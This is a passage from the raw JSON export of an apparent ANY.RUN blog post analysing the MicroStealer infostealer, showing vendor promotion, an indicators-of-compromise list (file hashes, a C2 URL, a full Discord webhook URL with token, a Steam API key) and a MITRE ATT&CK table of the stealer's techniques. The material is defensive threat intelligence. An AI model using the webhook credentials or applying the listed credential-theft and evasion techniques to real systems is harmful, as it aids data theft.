faster,&nbsp;reduce investigation time, and limit the risk of data theft inside corporate environments.&nbsp;<\/p>\n\n\n\n<p><a 
href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktoenterprise#contact-sales\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Bring speed and clarity to your SOC with ANY.RUN \u279c<\/strong><\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About&nbsp;ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">interactive malware&nbsp;analysis<\/a>&nbsp;and threat intelligence solutions, fits naturally into modern SOC workflows and supports investigations from&nbsp;initial&nbsp;alert to final containment.&nbsp;<\/p>\n\n\n\n<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an interactive environment, enrich indicators with immediate context through&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>, and continuously&nbsp;monitor&nbsp;emerging infrastructure&nbsp;using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=microstealer-technical-analysis&amp;utm_term=120326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Feeds<\/a>. 
Together, these capabilities help&nbsp;reduce uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.&nbsp;<\/p>\n\n\n\n<p>ANY.RUN also meets enterprise security and compliance expectations. The company is <a href=\"https:\/\/any.run\/compliance\/\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified,<\/a> reinforcing its commitment to protecting customer data and maintaining strong security controls. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Indicators&nbsp;of&nbsp;Compromise&nbsp;(IOCs)&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Analyzed Files<\/strong>&nbsp;<\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-283\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"4\"\n           data-rows=\"4\"\n           data-wpID=\"283\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        Name\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        MD5\u00a0                    
<\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        SHA1\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"D1\"\n                    data-col-index=\"3\"\n                    data-row-index=\"0\"\n                    style=\" width:25%;                    padding:10px;\n                    \"\n                    >\n                                        SHA256\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        RocobeSetup.exe (NSIS Installer)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        23A705FA71DA6A9191618AEDC1144C4A\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C2\"\n   
                 data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        755C21DD36A49086F98C87A172B900E6424F467A\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"D2\"\n                    data-col-index=\"3\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        9CF1D4F87D9F2EDF53CE681B59C209F57A805E6157693E784D9D946FC3B17A04\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Game Launcher.exe (Electron)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        A137BF79A2D5F1C8104AF40EC93E4E66\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    
style=\"                    padding:10px;\n                    \"\n                    >\n                                        C83D75BF9F9FDA4E6EF7B2C575BC9D3D82D6590B\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"D3\"\n                    data-col-index=\"3\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        05F0C8E89248D3477115D9F62B20CA8A95D925140C727E975AB9F3025A5AD01D\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        soft.jar (MicroStealerCore)\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        04EA30CD1B74E2844BE939BD1FFE0084\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                  
                      B7D0F8954BAFAB5E79AE96C07E683C229C9F7B72\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"D4\"\n                    data-col-index=\"3\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        DF5E2B824C0FD40323A46019BFBC325F89B5B68697ED3C94B52189CF90E1BEC4\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-283'>\ntable#wpdtSimpleTable-283{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-283 td, table.wpdtSimpleTable283 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Network indicators<\/strong>&nbsp;<\/h3>\n\n\n\n<p><strong>HTTPS&nbsp;Request:<\/strong>&nbsp;<\/p>\n\n\n\n<p>https[:]\/\/78smp[.]com\/m\/&nbsp;<\/p>\n\n\n\n<p>https[:]\/\/discord[.]com\/api\/webhooks\/1460660027969896695\/FQ2nam1vUVDwLbiTZCPen9C53eBMg_qB3-z8pGRtZ3ZerbyflDnzfmJVLpgElxMNfO41&nbsp;<\/p>\n\n\n\n<p><strong>Domains:&nbsp;<\/strong><\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-1 
wp-block-group-is-layout-grid\">\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>API Keys<\/strong><\/h3>\n\n\n\n<p>Steam Web API Key: 440D7F4D810EF9298D25EDDF37C1F902<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>MITRE ATT&amp;CK Techniques<\/strong><\/h3>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-284\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"19\"\n           data-wpID=\"284\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:29.498525073746%;                    padding:10px;\n                    \"\n                    >\n                                        Tactic\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    
data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:33.038348082596%;                    padding:10px;\n                    \"\n                    >\n                                        Technique\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:37.463126843658%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0002: Execution\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1204.002: User Execution: Malicious File\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n  
                  \"\n                    >\n                                        User runs NSIS installer \/ Game Launcher\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.001: PowerShell\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        PowerShell script with\u00a0Start-Process -Verb RunAs\u00a0for UAC\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    
><\/td><td>T1059.003: Windows Command Shell<\/td><td>schtasks used to create ONLOGON task<\/td><\/tr>\n<tr><td><strong>TA0003: Persistence<\/strong><\/td><td>T1053.005: Scheduled Task\/Job: Scheduled Task<\/td><td>Task App_&lt;username&gt;, ONLOGON, HIGHEST, 5s delay<\/td><\/tr>\n<tr><td><strong>TA0004: Privilege Escalation<\/strong><\/td><td>T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control<\/td><td>UAC prompt for elevation (social engineering)<\/td><\/tr>\n<tr><td><\/td><td>T1134.001: Access Token Manipulation: Token Impersonation\/Theft<\/td><td>DuplicateToken \/ ImpersonateLoggedOnUser on LSASS token<\/td><\/tr>\n<tr><td><strong>TA0005: Defense Evasion<\/strong><\/td><td>T1027: Obfuscated Files or Information<\/td><td>Node.js obfuscation + ZKM in JAR<\/td><\/tr>\n<tr><td><\/td><td>T1036.005: Masquerading: Match Legitimate Resource Name or Location<\/td><td>miicrosoft.exe, Game Launcher naming<\/td><\/tr>\n<tr><td><\/td><td>T1497.001: Virtualization\/Sandbox Evasion: System Checks<\/td><td>Process list check for VMware, VBox, QEMU, etc.<\/td><\/tr>\n<tr><td><strong>TA0006: Credential Access<\/strong><\/td><td>T1555.003: Credentials from Password Stores: Credentials from Web Browsers<\/td><td>Chromium\/Opera: passwords, autofill via DPAPI<\/td><\/tr>\n<tr><td><\/td><td>T1539: Steal Web Session Cookie<\/td><td>Browser cookies extraction (session hijacking)<\/td><\/tr>\n<tr><td><\/td><td>T1552.001: Unsecured Credentials: Credentials In Files<\/td><td>Wallet files and browser extension storage<\/td><\/tr>\n<tr><td><\/td><td>T1003.001: OS Credential Dumping: LSASS Memory<\/td><td>LSASS access when RunAsPPL=0, token duplicate<\/td><\/tr>\n<tr><td><strong>TA0007: Discovery<\/strong><\/td><td>T1082: System Information Discovery<\/td><td>Collects hostname, OS, username, env vars for exfil report<\/td><\/tr>\n<tr><td><strong>TA0009: Collection<\/strong><\/td><td>T1113: Screen Capture<\/td><td>Screenshot via java.awt.Robot, PNG<\/td><\/tr>\n<tr><td><\/td><td>T1560.001: Archive Collected Data: Archive via Utility<\/td><td>ZIP before exfiltration<\/td><\/tr>\n<tr><td><strong>TA0010: Exfiltration<\/strong><\/td><td>T1567.004: Exfiltration Over Web Service: Exfiltration Over Webhook<\/td><td>Data sent to Discord\/webhook<\/td><\/tr>\n<tr><td><strong>TA0011: Command and Control<\/strong><\/td><td>T1071.001: Application Layer Protocol: Web Protocols<\/td><td>HTTPS to C2 \/ webhooks<\/td><\/tr>\n<\/table>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>Security teams depend on early signals to spot and contain new threats. But what happens when a fully capable infostealer spreads while traditional detections stay limited? In recent investigations, ANY.RUN researchers observed MicroStealer in 40+ sandbox sessions in less than a month, despite low public visibility. 
Early activity points to distribution through compromised or impersonated accounts, [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":19062,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-19049","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>MicroStealer: Emerging Infostealer Targeting Corporate Credentials<\/title>\n<meta name=\"description\" content=\"Explore how MicroStealer operates, what risks it creates for enterprises, and how ANY.RUN helps security teams detect it faster.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nevergiveupcpp, 4OURUP and GridGuardGhoul\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\"},\"author\":{\"name\":\"nevergiveupcpp, 4OURUP and GridGuardGhoul\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0\",\"datePublished\":\"2026-03-12T09:56:43+00:00\",\"dateModified\":\"2026-03-25T10:16:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\"},\"wordCount\":3551,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\",\"name\":\"MicroStealer: Emerging Infostealer Targeting Corporate Credentials\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-03-12T09:56:43+00:00\",\"dateModified\":\"2026-03-25T10:16:50+00:00\",\"description\":\"Explore how MicroStealer operates, what risks it creates for enterprises, and how ANY.RUN helps security teams detect it 
faster.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"MicroStealer\u00a0Analysis: A Fast-Spreading Infostealer with Limited Detection\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},[{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"nevergiveupcpp\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/photo_author_2-150x150.jpg\",\"caption\":\"nevergiveupcpp\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"4OURUP\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/4up-150x150.jpg\",\"caption\":\"4OURUP\"}},{\"@type\":[\"Person\"],\"@id\":\"https:\/\/any.run\/\",\"name\":\"GridGuardGhoul\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/any.run\/\",\"inLanguage\":\"en_US\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/01\/image_GridGuardGhoul-150x150.jpeg\",\"caption\":\"GridGuardGhoul\"}}]]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19049"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-b
log\/wp-json\/wp\/v2\/comments?post=19049"}],"version-history":[{"count":98,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19049\/revisions"}],"predecessor-version":[{"id":19178,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19049\/revisions\/19178"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/19062"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=19049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=19049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=19049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}